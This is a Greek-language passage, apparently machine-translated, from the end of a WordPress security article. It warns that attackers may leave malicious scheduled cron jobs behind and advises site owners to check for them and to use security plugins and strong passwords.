Μερικές φορές, ένας εισβολέας δεν θα κάνει τίποτα στον ιστότοπό σας μόλις βρεθεί, θα φύγουν από προγραμματισμένες εκδηλώσεις κάτι που μπορεί να βλάψει τον ιστότοπό σας κάποια στιγμή στο μέλλον. Αυτή η τεχνική είναι επικίνδυνη επειδή ένας χάκερ μπορεί να αφήσει άπειρο θύμα στην αρχή. Μπορεί να έχετε μολυνθεί και να μην γνωρίζετε τίποτα γι ‘αυτό.

Λύση: Ελέγξτε τις εργασίες CRON σε έναν διακομιστή που χρησιμοποιείτε και βεβαιωθείτε ότι δεν υπάρχουν ύποπτες προγραμματισμένες εργασίες.

Τυλίγοντας

Ελπίζουμε ότι αυτό το άρθρο θα σας βοηθήσει να διαχειριστείτε ακόμη και έναν ασφαλέστερο ιστότοπο WordPress και ότι θα σας βοηθήσει να αποκτήσετε ξανά πρόσβαση σε αυτόν σε κακές καταστάσεις. Και ακόμα και αν ο ιστότοπός σας είναι καθαρός, μην το θεωρείτε δεδομένο.
Πάντα σιγουρευτείτε ότι το ιστολόγιό σας είναι όσο πιο ασφαλές μπορεί. Προτείνουμε πρόσθετα ασφαλείας για το WordPress που μπορούν να σας εξοικονομήσουν τις περισσότερες φορές. Ωστόσο, μην είστε αυτός που χρησιμοποιεί μη ασφαλή κωδικό πρόσβασης και να είστε προσεκτικοί κατά την εισβολή στον δικό σας ιστότοπο WordPress.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Like this post? Please share to your friends:
    Adblock
    detector
    map